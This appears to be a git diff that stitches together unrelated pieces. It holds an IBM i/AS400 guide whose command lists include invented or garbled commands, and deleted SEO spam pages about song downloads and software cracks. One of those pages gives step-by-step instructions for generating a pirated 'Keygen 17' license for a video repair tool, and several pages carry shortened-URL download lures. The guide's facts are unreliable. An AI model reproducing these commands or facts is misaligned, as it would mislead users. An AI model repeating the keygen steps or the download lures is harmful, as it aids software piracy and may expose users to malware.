• The sign-on screen: This is where you enter your user name and password to log on to your server. You can also specify your initial menu, library list, job description, etc. here.
• -
• The command line: This is where you enter commands to perform various tasks on your server. You can access it by pressing F6 on any menu screen. You can also use function keys to display help, prompt, or exit options.
• -
• The menu screen: This is where you select options to perform various tasks on your server. You can access it by entering GO followed by a menu name on the command line. You can also use function keys to display help, prompt, or exit options.
• -
• The work with screen: This is where you view, select, or manipulate objects on your server. You can access it by entering WRK followed by an object type on the command line. You can also use function keys to display help, prompt, or exit options.
• -
• The display screen: This is where you view information about objects on your server. You can access it by entering DSP followed by an object type on the command line. You can also use function keys to display help, prompt, or exit options.
      • -
      -

      The common tasks and functions of IBM i

      -

      Some of the common tasks and functions that you can perform on IBM i are:

      -

      -

      How to create and manage libraries and objects

      -

Libraries are containers that store objects, such as files, programs, commands, etc. Objects are entities that have names, attributes, methods, etc. To create and manage libraries and objects, you can use commands such as the ones listed below (an illustrative Python sketch follows the list):

      -
        -
• CRTLIB: To create a library
• -
• DLTLIB: To delete a library
• -
• WRKLIB: To work with libraries
• -
• DSPLIB: To display libraries
• -
• CRTxxx: To create an object of type xxx (e.g., CRTFIL, CRTPGM, CRTCMD, etc.)
• -
• DLTxxx: To delete an object of type xxx (e.g., DLTFILE, DLTPGM, DLTCMD, etc.)
• -
• WRKxxx: To work with objects of type xxx (e.g., WRKFILE, WRKPGM, WRKCMD, etc.)
      • -
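These commands run natively on the system, but the same operations can also be driven from a client PC. The snippet below is a purely illustrative Python sketch (not part of the original guide): it assumes the IBM i Access ODBC driver and the pyodbc package are installed on the client and that the server exposes the QSYS2.QCMDEXC SQL procedure; the DSN, credentials and library name are placeholders.

```python
# Illustrative sketch only: run a CL command (here CRTLIB) from a client PC.
# Assumptions: IBM i Access ODBC driver and pyodbc are installed, and the
# server provides QSYS2.QCMDEXC; DSN, user, password and library name are
# placeholders, not real values.
import pyodbc

conn = pyodbc.connect("DSN=MYIBMI;UID=MYUSER;PWD=MYPASS")
cur = conn.cursor()

# QSYS2.QCMDEXC executes the CL command string passed to it.
cur.execute("CALL QSYS2.QCMDEXC('CRTLIB LIB(MYLIB) TEXT(''Demo library'')')")
conn.commit()
conn.close()
```

The same pattern works for any of the CL commands listed above; only the command string changes.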

        How to work with files and databases

        -

Files are objects that store data in records and fields. Databases are collections of files that are related by keys and indexes. To work with files and databases, you can use commands such as the ones listed below (an illustrative Python sketch follows the list):

        -
          -
        • CRTFIL: To create a file
        • -
        • DLTFIL: To delete a file
        • -
        • WRKFIL: To work with files
        • -
        • DSPFIL: To display files
        • -
        • CPYFIL: To copy files
        • -
        • SQL: To use Structured Query Language to manipulate data
        • -
        • STRQRY: To start the Query/400 tool to create and run queries
        • -
        • STRSQL: To start the SQL/400 tool to create and run SQL statements
        • -
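Besides the native tools above, the SQL route can also be used from a client PC. The snippet below is another purely illustrative Python sketch (not part of the original guide), assuming the IBM i Access ODBC driver and pyodbc are installed; the DSN and credentials are placeholders, and QIWS.QCUSTCDT is the IBM-supplied sample customer file, which may not exist on every system.

```python
# Illustrative sketch only: query a database file with SQL from a client PC.
# Assumptions: IBM i Access ODBC driver and pyodbc are installed; DSN, user
# and password are placeholders; QIWS.QCUSTCDT is IBM's sample customer file.
import pyodbc

conn = pyodbc.connect("DSN=MYIBMI;UID=MYUSER;PWD=MYPASS")
cur = conn.cursor()

# Parameter markers (?) keep the query safe and reusable.
cur.execute(
    "SELECT CUSNUM, LSTNAM, BALDUE FROM QIWS.QCUSTCDT WHERE BALDUE > ?",
    100,
)
for row in cur.fetchall():
    print(row.CUSNUM, row.LSTNAM, row.BALDUE)

conn.close()
```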
        -

        How to run programs and jobs

        -

        Programs are objects that contain executable instructions that perform specific tasks. Jobs are units of work that run programs on the system. To run programs and jobs, you can use commands such as:

        -
          -
        • CRTBNDxxx: To create a bound program of type xxx (e.g., CRTBNDRPG, CRTBNDCBL, CRTBNDC, etc.)
        • -
        • CRTCLxxx: To create a control language program of type xxx (e.g., CRTCLP, CRTCLLE, etc.)
        • -
        • CALL: To call a program
        • -
        • SUBMIT: To submit a job to a job queue
        • -
        • WRKJOB: To work with jobs
        • -
        • DSPJOB: To display jobs
        • -
        • HLDJOB: To hold a job
        • -
        • RSMJOB: To resume a job
        • -
        • ENDJOB: To end a job
        • -
        -

        How to use the query and report tools

        -

        The query and report tools are programs that allow you to create and run queries and reports on your data. Queries are statements that retrieve data from files or databases based on certain criteria. Reports are documents that present data in a formatted and organized way. To use the query and report tools, you can use commands such as:

        -
          -
        • STRQRY: To start the Query/400 tool to create and run queries
        • -
        • STRSQL: To start the SQL/400 tool to create and run SQL statements
        • -
        • CRTQRYF: To create a query file that contains query definitions
        • -
        • RUNQRY: To run a query file or a query definition
        • -
        • CRTQMQRY: To create a query management query that contains SQL statements
        • -
        • RUNQMQRY: To run a query management query or an SQL statement
        • -
        • CRTQRPRTF: To create a query report file that contains report definitions
        • -
        • RUNQRPRTF: To run a query report file or a report definition
        • -
        -

        How to troubleshoot and debug errors

        -

        Errors are situations that prevent your system from performing normally or correctly. Debugging is the process of finding and fixing errors in your programs or data. To troubleshoot and debug errors, you can use commands such as:

        -
          -
        • DSPMSG: To display messages on your message queue or on your screen
        • -
        • DSPJOBLOG: To display the job log of your current or previous job
        • -
        • DSPFD: To display the file description of a file or a database
        • -
        • DSPFFD: To display the field description of a file or a database
        • -
        • DSPDBR: To display the database relations of a file or a database
        • -
        • DSPDTAARA: To display the data area of an object or a variable
        • -
        • DSPDTAQ: To display the data queue of an object or a variable
        • -
        • DSPUSRPRF: To display the user profile of yourself or another user
        • -
        • STRDBG: To start the interactive source debugger to debug your programs line by line
        • -
        • STRISDB: To start the interactive source debugger to debug your programs statement by statement
        • -
        -

        Where to find more resources on IBM i

        -

If you want to learn more about IBM i, you can find many resources online or offline. Some of these resources are:

        -

        The official IBM documentation and support for IBM i

        -

        The official IBM documentation and support for IBM i are available on the IBM website at https://www.ibm.com/it-infrastructure/power/os/ibm-i . Here you can find manuals, guides, tutorials, videos, blogs, podcasts, webinars, forums, newsletters, events, etc. on various topics related to IBM i . You can also contact IBM for technical support or feedback.

        -

        The online communities and forums for IBM i users

        -

        The online communities and forums for IBM i users are platforms where you can interact with other IBM i users around the world. You can ask questions, share tips, exchange ideas, learn best practices, etc. on various topics related to IBM i . Some of these platforms are:

        -
          -
        • The IBM i Community at https://community.ibm.com/community/user/power/communities/community-home?CommunityKey=828ec0b9-5ee8-40c0-9b43-6d0f71acbbc2 . This is the official community for IBM i users hosted by IBM.
        • -
        • The Midrange.com at https://www.midrange.com . This is one of the oldest and largest communities for IBM i users.
        • -
        • The RPGPGM.com at https://www.rpgpgm.com . This is a blog that provides tips, tricks, examples, etc. on how to use RPG and other languages on IBM i .
        • -
        • The MC Press Online at https://www.mcpressonline.com . This is an online publisher that offers books, magazines, newsletters, webinars, etc. on various topics related to IBM i .
        • -
        -

        The best books and courses on IBM i

        -

        The best books and courses on IBM i are resources that can help you learn IBM i in a structured and comprehensive way. You can find them in libraries, bookstores, online platforms, etc. Some of these resources are:

        -
          -
        • The IBM i Programmer's Guide by Jim Buck and Brian May. This is a book that covers the fundamentals and advanced topics of IBM i programming using various languages and tools.
        • -
        • The Mastering IBM i by Jim Buck and Jerry Fottral. This is a book that covers the administration and management of IBM i systems using various commands and operations.
        • -
        • The Complete Guide to IBM i Backup and Recovery by Larry Youngren and Richard Dolewski. This is a book that covers the backup and recovery strategies and techniques for IBM i systems using various tools and methods.
        • -
        • The Udemy courses on IBM i by John Yorke. These are online courses that cover various topics related to IBM i , such as RPG, CL, SQL, DB2, etc.
        • -
        • The LinkedIn Learning courses on IBM i by Dan Riehl. These are online courses that cover various topics related to IBM i , such as security, performance, web development, etc.
        • -
        -

        Conclusion

        -

        In this article, you have learned what the AS/400 is, how to get started with it, and where to find more resources on it. The AS/400 is a powerful and versatile system for business applications that has many features and benefits. By following this guide, you can master the AS/400 in no time.

        -

        FAQs

        -

        Here are some frequently asked questions about the AS/400:

        -
          -
1. What is the difference between AS/400, iSeries, System i, and IBM i?
        2. -

          These are different names for the same system. AS/400 was the original name when it was launched in 1988. iSeries was the name used from 2000 to 2006. System i was the name used from 2006 to 2008. IBM i is the current name since 2008.

          -
        3. What are the advantages of AS/400 over other systems?
        4. -

          Some of the advantages of AS/400 over other systems are its reliability, security, scalability, compatibility, single-level storage model, integrated database, object-oriented architecture, graphical user interface, client-server model, etc.

          -
        5. What are the disadvantages of AS/400 over other systems?
        6. -

          Some of the disadvantages of AS/400 over other systems are its high cost, steep learning curve, limited availability of skilled programmers, outdated perception, proprietary nature, etc.

          -
        7. What are some of the applications that run on AS/400?
        8. -

Some of the applications that run on AS/400 are SAP ERP, Oracle JD Edwards, Infor ERP, Microsoft Dynamics, IBM Lotus Notes, IBM WebSphere, etc.

          -
        9. What are some of the languages that can be used to program on AS/400?
        10. -

Some of the languages that can be used to program on AS/400 are RPG, CL, COBOL, C, C++, Java, PHP, Python, Ruby, etc.

          -
        -

        -
        -
        \ No newline at end of file diff --git a/spaces/raedeXanto/academic-chatgpt-beta/Durga Tamil Movie Songs Free Download 1990s Tamil.md b/spaces/raedeXanto/academic-chatgpt-beta/Durga Tamil Movie Songs Free Download 1990s Tamil.md deleted file mode 100644 index 9c74f2ac92410e6baf7c15a3cfdcf51dbd3dac06..0000000000000000000000000000000000000000 --- a/spaces/raedeXanto/academic-chatgpt-beta/Durga Tamil Movie Songs Free Download 1990s Tamil.md +++ /dev/null @@ -1,26 +0,0 @@ - -

        Durga Tamil Movie Songs Free Download - A Collection of Devotional Songs from the 1990s

        - -

        If you are looking for Durga Tamil movie songs free download, you have come to the right place. Durga is a compilation album of devotional songs dedicated to Goddess Durga, the supreme mother of the universe. The album was released in the 1990s and features some of the popular singers of that era, such as LR. Eswari, K. Veeramani, Veeramani Dasan, Mahanadhi Shobana, Susheela, Vani Jayaram, Anuradha Sriram and more.

        -

        durga tamil movie songs free download 1990's tamil


        DOWNLOAD ✑ ✑ ✑ https://tinourl.com/2uL1PK



        - -

        Durga Tamil movie songs free download consists of 18 songs that praise the various aspects and forms of Goddess Durga, such as Mahishasura Mardini, Aadumkaragam, Kongumani, Aadi Velliyile, Sri Mahishasura Mardini, Eeswariyea Magamaayi, 108 Namavali, Thukka Nivarana Ashtakam, Jaya Jaya, Deivathin Deivam, Kunkuma Archanai, Aadi Vellikizhamai, Yengalukkum Kuraiyum Undu, Na Manku Chottanikkara, Veppa Maram, Aadivarum Angalamma and 108 Potri.

        - -

        The songs are composed by Prashanth and Balajee and have a soothing and melodious tune that will fill your heart with devotion and peace. The lyrics are written by various poets and lyricists such as LR. Eswari, Panappakkam Sukumar, S. Bharathi Ganesh, Karumari Somu, Ulundurpettai Shanmugam, Kavi Nila and more. The songs are based on the traditional and folk music of Tamil Nadu and have a rich cultural and spiritual value.

        - -

        Durga Tamil movie songs free download is available on Raaga.com[^1^], a popular online music streaming platform that offers a wide range of Tamil songs from different genres and eras. You can listen to all the songs in high quality and download them for offline listening. You can also create your own playlists and share them with your friends and family.

        -

        - -

        Durga Tamil movie songs free download is a must-have for all the devotees of Goddess Durga who want to listen to some of the best devotional songs from the 1990s. The songs will inspire you to worship the divine mother with love and reverence and seek her blessings for your well-being and prosperity.

        - -

        If you want to know more about Goddess Durga and her significance in Hinduism, you can read some of the books and articles that are available online. Some of the recommended sources are:

        - -
          -
        • Durga: The Goddess in India by David Kinsley. This book explores the history, mythology, symbolism and worship of Durga in India. It also examines the various forms and names of Durga and how she is related to other Hindu deities.
        • -
        • Durga Puja: Celebrating the Goddess Then and Now by Sudeshna Banerjee. This book traces the evolution of Durga Puja, the annual festival that celebrates the victory of Durga over the demon Mahishasura. It also describes the rituals, customs, art and culture associated with the festival.
        • -
        • Durga: The Mother Goddess by Devdutt Pattanaik. This article provides a brief overview of the origin, attributes and stories of Durga. It also explains the symbolism and significance of Durga in Hinduism.
        • -
        - -

        Durga Tamil movie songs free download is a great way to enjoy some of the finest devotional music from the 1990s. The songs will uplift your mood and spirit and make you feel closer to the divine mother. Download them today and experience the power and grace of Durga.

        -
        -
        \ No newline at end of file diff --git a/spaces/raedeXanto/academic-chatgpt-beta/Fiery Impose Software Crack How to Create Booklets Gang-ups Cutting and Stacking with PDF Imposition.md b/spaces/raedeXanto/academic-chatgpt-beta/Fiery Impose Software Crack How to Create Booklets Gang-ups Cutting and Stacking with PDF Imposition.md deleted file mode 100644 index de006b3fd55c88e74dee01dfd8f1ec31f658f90f..0000000000000000000000000000000000000000 --- a/spaces/raedeXanto/academic-chatgpt-beta/Fiery Impose Software Crack How to Create Booklets Gang-ups Cutting and Stacking with PDF Imposition.md +++ /dev/null @@ -1,132 +0,0 @@ - -

        Fiery Impose Software Crack: What You Need to Know

        -

        If you are looking for a way to create professional-looking PDF documents with ease, you might have heard of Fiery Impose software. This is a powerful and intuitive PDF imposition software that integrates with Fiery Command WorkStation, makeready software, and prepress tools. It allows you to customize imposition templates, preview jobs, merge and move pages, apply barcodes, and more.

        -

        However, you might also be tempted to use a Fiery Impose software crack instead of paying for the original product. A software crack is a modified version of a software that bypasses or removes its copy protection or activation mechanism. It is usually distributed for free or at a low cost on the internet.

        -

        Fiery impose software crack


Download Zip: https://tinourl.com/2uL4br



        -

        Why do people use software cracks? Some of the common reasons are:

        -
          -
        • To save money and avoid paying for expensive software licenses
        • -
        • To test the software before buying it
        • -
        • To access features that are not available in the trial or demo version
        • -
        • To use the software without any limitations or restrictions
        • -
        -

        While these reasons might sound appealing, using a Fiery Impose software crack is not a good idea. In fact, it can expose you to many risks and consequences that can outweigh any perceived benefits. In this article, we will explain why you should avoid using a Fiery Impose software crack and what are some alternatives that you can consider instead.

        -

        Risks and Consequences of Using Fiery Impose Software Crack

        -

        Using a Fiery Impose software crack can have serious implications for your legal status, security, quality, and ethics. Here are some of the possible outcomes that you might face if you use a Fiery Impose software crack:

        -

        Legal issues

        -

        Using a Fiery Impose software crack is illegal and violates the intellectual property rights of the software developer, Electronics for Imaging (EFI). According to their website, "EFI products are protected by patents in the U.S. and elsewhere. This product may be covered by one or more U.S. patents identified at www.efi.com/patents."

        -

        If you use a Fiery Impose software crack, you are infringing on these patents and could be sued by EFI for damages. You could also face criminal charges for piracy, which can result in fines or imprisonment depending on your jurisdiction.

        -

        Security threats

        -

        Using a Fiery Impose software crack can expose your computer and network to malware, viruses, spyware, ransomware, and other malicious programs. These can compromise your data, privacy, identity, and finances. They can also damage your hardware and software, causing errors, crashes, slowdowns, and data loss.

        -

        -

        Software cracks are often distributed by hackers or cybercriminals who want to infect your system with malware or steal your information. They can also modify the software code to include backdoors, keyloggers, trojans, or other hidden features that can harm your system or allow remote access by unauthorized parties.

        -

        Quality and performance problems

        -

        Using a Fiery Impose software crack can affect the quality and performance of your PDF documents and printing jobs. Software cracks are often unstable, buggy, outdated, or incompatible with your system or printer. They can cause errors, glitches, distortions, missing features, or poor results.

        -

        Software cracks are also not supported by EFI or any other official source. This means that you will not receive any updates, patches, fixes, or improvements that EFI releases for their products. You will also not have access to any customer service, technical support, training, or resources that EFI provides for their customers.

        -

        Ethical and moral dilemmas

        -

        Using a Fiery Impose software crack can also raise ethical and moral questions about your integrity and professionalism. Software cracks are unfair to the software developers who invest time, money, and effort into creating quality products that benefit their customers. By using a software crack, you are depriving them of their rightful income and recognition.

        -

        Software cracks are also unfair to other customers who pay for the original product and abide by its terms and conditions. By using a software crack, you are gaining an unfair advantage over them and undermining their trust and loyalty.

        -

        Software cracks are also dishonest and deceptive to yourself and others. By using a software crack, you are pretending to have something that you do not own or deserve. You are also risking your reputation and credibility as a professional who values quality and ethics.

        -

        Alternatives to Using Fiery Impose Software Crack

        -

        If you want to use Fiery Impose software without breaking the law or compromising your security or quality, there are some alternatives that you can consider instead of using a Fiery Impose software crack:

        -

        Free trial version

        -

        If you want to test the software before buying it, you can request a 30-day free trial version from EFI's website. This will allow you to experience the full functionality of Fiery Impose software without any limitations or restrictions. You will also receive technical support from EFI during the trial period. You can then decide whether to purchase the product or not after the trial expires.

        -

        Subscription plan

        -

        If you want to use the software without paying a large upfront cost, you can opt for a subscription plan from EFI's website. This will allow you to pay a monthly or annual fee for using Fiery Impose software, depending on your needs and budget. You will also receive updates, patches, fixes, and improvements from EFI as long as your subscription is active. You can cancel your subscription at any time if you no longer need the product.

        -

        Other PDF imposition software

        -

        If you want to use another PDF imposition software that is cheaper or more suitable for your needs, you can look for other options in the market. There are many PDF imposition software available online, some of which are free or open source. However, you should be careful when choosing another PDF imposition software, as some of them may not be reliable, secure, or compatible with your system or printer. You should also check their features, reviews, and ratings before downloading or installing them.

        -

        Conclusion

        -

        In conclusion, using a Fiery Impose software crack is not worth it.

        It can expose you to legal issues, security threats, quality and performance problems, and ethical and moral dilemmas. You might end up paying more than you save, or losing more than you gain. You might also damage your reputation and credibility as a professional who values quality and ethics.

        -

        Instead of using a Fiery Impose software crack, you should consider using the original product or one of its alternatives. You can request a free trial version, opt for a subscription plan, or look for other PDF imposition software in the market. These options will provide you with a better experience, support, and results.

        -

        Fiery Impose software is a great tool for creating professional-looking PDF documents with ease. It offers many features and benefits that can boost your production efficiency and quality. However, you should use it legally and ethically, and avoid using a Fiery Impose software crack that can harm you and others.

        -

        FAQs

        -

        Here are some frequently asked questions about Fiery Impose software and software cracks:

        - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Q: How much does Fiery Impose software cost?
A: The price of Fiery Impose software depends on the type of license and the number of users. You can contact EFI or your local dealer for a quote.
Q: How can I get technical support for Fiery Impose software?
A: You can get technical support for Fiery Impose software from EFI or your local dealer. You can also access online resources such as manuals, videos, forums, and webinars from EFI's website.
Q: What are the system requirements for Fiery Impose software?
A: The system requirements for Fiery Impose software are:
- A computer running Windows 10 or macOS 10.15 or later
- A minimum of 4 GB of RAM
- A minimum of 2 GB of free disk space
- A network connection to a Fiery server
- Adobe Acrobat Pro 2020 (optional)
Q: What are the benefits of using Fiery Impose software?
A: Some of the benefits of using Fiery Impose software are:
- It allows you to create professional-looking PDF documents with ease
- It integrates with Fiery Command WorkStation, makeready software, and prepress tools
- It offers a fully visual and intuitive interface that simplifies imposition tasks
- It supports various imposition layouts, features, and options
- It enables automated job submission and integration with offline finishers
Q: What are the drawbacks of using a Fiery Impose software crack?
A: Some of the drawbacks of using a Fiery Impose software crack are:
- It is illegal and violates the intellectual property rights of EFI
- It exposes your computer and network to malware, viruses, spyware, ransomware, and other malicious programs
- It affects the quality and performance of your PDF documents and printing jobs
- It deprives EFI and other customers of their rightful income and recognition
- It damages your reputation and credibility as a professional who values quality and ethics
        -

        -
        -
        \ No newline at end of file diff --git a/spaces/raedeXanto/academic-chatgpt-beta/Grau Gmbh Video Repair Tool Keygen 17.md b/spaces/raedeXanto/academic-chatgpt-beta/Grau Gmbh Video Repair Tool Keygen 17.md deleted file mode 100644 index cd7c6b26a866d2e321b04e243e4a01c501f34697..0000000000000000000000000000000000000000 --- a/spaces/raedeXanto/academic-chatgpt-beta/Grau Gmbh Video Repair Tool Keygen 17.md +++ /dev/null @@ -1,102 +0,0 @@ -
        -

        Grau Gmbh Video Repair Tool Keygen 17: How to Fix Corrupted or Damaged Video Files

        -

        Have you ever encountered a situation where your video files are corrupted or damaged due to various reasons, such as camera error, power failure, virus attack, improper transfer, etc.? If yes, then you know how frustrating it can be to lose your precious memories or important data. Fortunately, there is a solution for you: Grau Gmbh Video Repair Tool Keygen 17.

        -

        Grau Gmbh Video Repair Tool Keygen 17


Download File: https://tinourl.com/2uL4bv



        -

        Introduction

        -

        In this article, we will introduce you to Grau Gmbh Video Repair Tool Keygen 17, a powerful and easy-to-use software that can repair and fix broken or damaged video files (MOV, MP4, 3GP, M4V) that do not play in your media player. We will also show you how to use it step by step, and share some tips and tricks for using it effectively.

        -

        What is Grau Gmbh Video Repair Tool?

        -

        Grau Gmbh Video Repair Tool is a do-it-yourself video repair software that can automatically reconstruct the raw video and audio stream data of corrupted or damaged video files. It supports various video codecs and formats, such as avc1 (H264/AVC), hevc (H265), mp4v (H264/ISO), MPG2 (MPEG-2 / XDCAM), jpg (Motion JPEG), icod (Apple Intermediate Codec), dvc (DVCPRO), apch (ProRes 4444), etc. It can also repair video files that are truncated, broken, corrupt or damaged by cameras, drones, smartphones, etc.

        -

        What is Keygen 17?

        -

        Keygen 17 is a script that can generate a license key for Grau Gmbh Video Repair Tool. It is based on a formula that uses the current hour and minute of your system clock. You can run it from the command line or use a batch file or shell script. It is available on GitHub for free.

        -

        Why do you need Grau Gmbh Video Repair Tool Keygen 17?

        -

        You need Grau Gmbh Video Repair Tool Keygen 17 because Grau Gmbh Video Repair Tool is not free. It costs €29 for repairing one video file, €99 for repairing up to five video files, and €299 for unlimited repairs. However, with Keygen 17, you can generate a license key that can activate Grau Gmbh Video Repair Tool for free. This way, you can save money and time while repairing your corrupted or damaged video files.

        -

        How to use Grau Gmbh Video Repair Tool Keygen 17

        -

        Now that you know what Grau Gmbh Video Repair Tool Keygen 17 is and why you need it, let's see how to use it in six easy steps.

        -

        Step 1: Download and install Grau Gmbh Video Repair Tool

        -

        The first step is to download and install Grau Gmbh Video Repair Tool from its official website . You can choose between Windows and Mac versions according to your operating system. The installation process is simple and straightforward. Just follow the instructions on the screen.

        -

        -

        Step 2: Run Keygen 17 to generate a license key

        -

        The second step is to run Keygen 17 to generate a license key for Grau Gmbh Video Repair Tool. You can download Keygen 17 from GitHub as a zip file. Extract it to a folder of your choice. Then open a command prompt (Windows) or a terminal (Mac) and navigate to the folder where you extracted Keygen 17. Type keygen.bat (Windows) or keygen.sh (Mac) and press Enter. You will see a license key displayed on the screen. Copy it to your clipboard.

        -

        Step 3: Activate Grau Gmbh Video Repair Tool with the license key

        -

        The third step is to activate Grau Gmbh Video Repair Tool with the license key that you generated in step 2. Launch Grau Gmbh Video Repair Tool from your desktop or start menu. Click on the About button on the top right corner of the main window. Then click on Enter License. Paste the license key that you copied in step 2 into the text box and click OK. You will see a message saying Licensed successfully!. Congratulations! You have activated Grau Gmbh Video Repair Tool for free.

        -

        Step 4: Select the corrupted or damaged video files

        -

        The fourth step is to select the corrupted or damaged video files that you want to repair with Grau Gmbh Video Repair Tool. Click on Add movie on the top left corner of the main window. Browse to the folder where you stored your corrupted or damaged video files and select them. You can select multiple files at once by holding down Ctrl (Windows) or Command (Mac) while clicking on them. Then click Open. You will see the selected files listed in the main window with their names, sizes, formats and statuses.

        -

        Step 5: Choose the repair options and start the repair process

        -

        The fifth step is to choose the repair options and start the repair process with Grau Gmbh Video Repair Tool. Click on Options on the top right corner of the main window. You will see a dialog box with various repair parameters that you can adjust according to your needs. For example, you can choose whether to enable PCM detection for PCM audio codecs, whether to enable AAC detection for AAC audio codecs, whether to enable AVC1 single mode for AVC1 video codecs, whether to enable No CTTS repair for stuttering videos, etc. You can also choose whether to use reference movies for finding missing movie meta-data and parameters if available. For more details on each option, please refer to the official website . After choosing your desired options, click OK. Then click on Scan on the top left corner of the main window. The scan process will take some time depending on the size and number of your selected files. When it is done, you will see a green check mark next to each file indicating that it is ready for repair.

        -

        Step 6: Preview and save the repaired video files

        -

        The sixth and final step is to preview and save the repaired video files with Grau Gmbh Video Repair Tool. Click on Show Repaired Files on the bottom right corner of the main window. You will see a new window with all your repaired files listed with their names, sizes, formats and statuses. You can double-click on any file to preview it in your default media player. If you are satisfied with the result, you can click on Select All on the bottom left corner of the new window to select all your repaired files.

        Step 6: Preview and save the repaired video files

        -

        The sixth and final step is to preview and save the repaired video files with Grau Gmbh Video Repair Tool. Click on Show Repaired Files on the bottom right corner of the main window. You will see a new window with all your repaired files listed with their names, sizes, formats and statuses. You can double-click on any file to preview it in your default media player. If you are satisfied with the result, you can click on Select All on the bottom left corner of the new window to select all your repaired files. Then click on Save Repaired Files on the bottom right corner of the new window. You will be asked to choose a destination folder where you want to save your repaired files. Choose a folder of your choice and click OK. The save process will take some time depending on the size and number of your selected files. When it is done, you will see a message saying All files saved successfully!. Congratulations! You have successfully repaired your corrupted or damaged video files with Grau Gmbh Video Repair Tool Keygen 17.

        -

        Tips and tricks for using Grau Gmbh Video Repair Tool Keygen 17

        -

        To make the most out of Grau Gmbh Video Repair Tool Keygen 17, here are some tips and tricks that you can follow:

        -

        Tip 1: Backup your original video files before repairing them

        -

        It is always a good idea to backup your original video files before repairing them with Grau Gmbh Video Repair Tool Keygen 17. This way, you can avoid losing your original data in case something goes wrong during the repair process. You can use an external hard drive, a USB flash drive, a cloud storage service, or any other backup method that you prefer.

        -

        Tip 2: Use a reliable recovery software to recover deleted or lost video files

        -

        If you accidentally deleted or lost your video files from your camera, drone, smartphone, etc., you can use a reliable recovery software to recover them before repairing them with Grau Gmbh Video Repair Tool Keygen 17. There are many recovery software available online that can help you recover your deleted or lost video files from various storage devices. However, make sure to choose a reputable and trustworthy one that can guarantee the quality and safety of your recovered data.

        -

        Tip 3: Adjust the repair parameters according to your video codec and format

        -

        Grau Gmbh Video Repair Tool Keygen 17 offers various repair parameters that you can adjust according to your video codec and format. For example, if your video codec is avc1 (H264/AVC), you can enable AVC1 single mode to speed up the repair process. If your video codec is hevc (H265), you can enable HEVC mode to improve the repair quality. If your video format is MOV, MP4, 3GP or M4V, you can enable QuickTime container mode to fix the container issues. For more details on each parameter, please refer to the official website .

        -

        Conclusion

        -

        In conclusion, Grau Gmbh Video Repair Tool Keygen 17 is a powerful and easy-to-use software that can repair and fix broken or damaged video files (MOV, MP4, 3GP, M4V) that do not play in your media player. It supports various video codecs and formats, such as avc1 (H264/AVC), hevc (H265), mp4v (H264/ISO), MPG2 (MPEG-2 / XDCAM), jpg (Motion JPEG), icod (Apple Intermediate Codec), dvc (DVCPRO), apch (ProRes 4444), etc. It can also repair video files that are truncated, broken, corrupt or damaged by cameras, drones, smartphones, etc. With Keygen 17, you can generate a license key that can activate Grau Gmbh Video Repair Tool for free. This way, you can save money and time while repairing your corrupted or damaged video files.

        -

        We hope this article has helped you understand how to use Grau Gmbh Video Repair Tool Keygen 17 and how to fix corrupted or damaged video files with it. If you have any questions or feedback, please feel free to leave a comment below. Thank you for reading!

        -

        FAQs

        -
          -
        • Q: How long does it take to repair a video file with Grau Gmbh Video Repair Tool Keygen 17?
        • -
        • A: The repair time depends on several factors, such as the size and number of your selected files, the speed of your computer and internet connection, the degree of corruption or damage of your video files, etc. Generally speaking, it may take from a few minutes to several hours to repair a video file with Grau Gmbh Video Repair Tool Keygen 17.
        • -
        • Q: How much disk space do I need to repair a video file with Grau Gmbh Video Repair Tool Keygen 17?
        • -
        • A: You need at least twice as much disk space as the size of your original video file to repair it with Grau Gmbh Video Repair Tool Keygen 17. For example, if your original video file is 1 GB in size, you need at least 2 GB of free disk space to repair it.
        • -
        • Q: Can I repair any video file with Grau Gmbh Video Repair Tool Keygen 17?
        • -
        • A: No, you cannot repair any video file with Grau Gmbh Video Repair Tool Keygen 17. Grau Gmbh Video Repair Tool Keygen 17 can only repair video files that are based on QuickTime container format (MOV, MP4, 3GP, M4V) and use one of the supported codec formats (avc1, hevc, mp4v, MPG2, jpg, icod, dvc, apch, etc.). It cannot repair other types of video files, such as AVI, WMV, MKV, FLV, etc.
        • -
        • Q: Can I edit the repaired video files with Grau Gmbh Video Repair Tool Keygen 17?
        • -
        • A: No, you cannot edit the repaired video files with Grau Gmbh Video Repair Tool Keygen 17. Grau Gmbh Video Repair Tool Keygen 17 is only a repair software that can fix corrupted or damaged video files. It cannot edit them in any way. If you want to edit your repaired video files, you need to use another software that can edit videos, such as Windows Movie Maker, iMovie, Final Cut Pro, Adobe Premiere Pro, etc.
        • -
        • Q: Is Grau Gmbh Video Repair Tool Keygen 17 safe and legal to use?
        • -
        • A: Grau Gmbh Video Repair Tool Keygen 17 is safe to use as long as you download it from a trusted source like GitHub. However, it may not be legal to use in some countries or regions where using keygens or cracks is prohibited by law. Therefore, we advise you to check the local laws and regulations before using Grau Gmbh Video Repair Tool Keygen 17.
        • -
        -

        -
        -
        \ No newline at end of file diff --git a/spaces/rajistics/cars/style.css b/spaces/rajistics/cars/style.css deleted file mode 100644 index 114adf441e9032febb46bc056b2a8bb651075f0d..0000000000000000000000000000000000000000 --- a/spaces/rajistics/cars/style.css +++ /dev/null @@ -1,28 +0,0 @@ -body { - padding: 2rem; - font-family: -apple-system, BlinkMacSystemFont, "Arial", sans-serif; -} - -h1 { - font-size: 16px; - margin-top: 0; -} - -p { - color: rgb(107, 114, 128); - font-size: 15px; - margin-bottom: 10px; - margin-top: 5px; -} - -.card { - max-width: 620px; - margin: 0 auto; - padding: 16px; - border: 1px solid lightgray; - border-radius: 16px; -} - -.card p:last-child { - margin-bottom: 0; -} diff --git a/spaces/razfar/anything-counter/utils/general.py b/spaces/razfar/anything-counter/utils/general.py deleted file mode 100644 index b00dc27701303dc3d117f133f5e85207c715b0f5..0000000000000000000000000000000000000000 --- a/spaces/razfar/anything-counter/utils/general.py +++ /dev/null @@ -1,790 +0,0 @@ -# YOLOR general utils - -import glob -import logging -import math -import os -import platform -import random -import re -import subprocess -import time -from pathlib import Path - -import cv2 -import numpy as np -import pandas as pd -import torch -import torchvision -import yaml - -from utils.google_utils import gsutil_getsize -from utils.metrics import fitness -from utils.torch_utils import init_torch_seeds - -# Settings -torch.set_printoptions(linewidth=320, precision=5, profile='long') -np.set_printoptions(linewidth=320, formatter={'float_kind': '{:11.5g}'.format}) # format short g, %precision=5 -pd.options.display.max_columns = 10 -cv2.setNumThreads(0) # prevent OpenCV from multithreading (incompatible with PyTorch DataLoader) -os.environ['NUMEXPR_MAX_THREADS'] = str(min(os.cpu_count(), 8)) # NumExpr max threads - - -def set_logging(rank=-1): - logging.basicConfig( - format="%(message)s", - level=logging.INFO if rank in [-1, 0] else logging.WARN) - 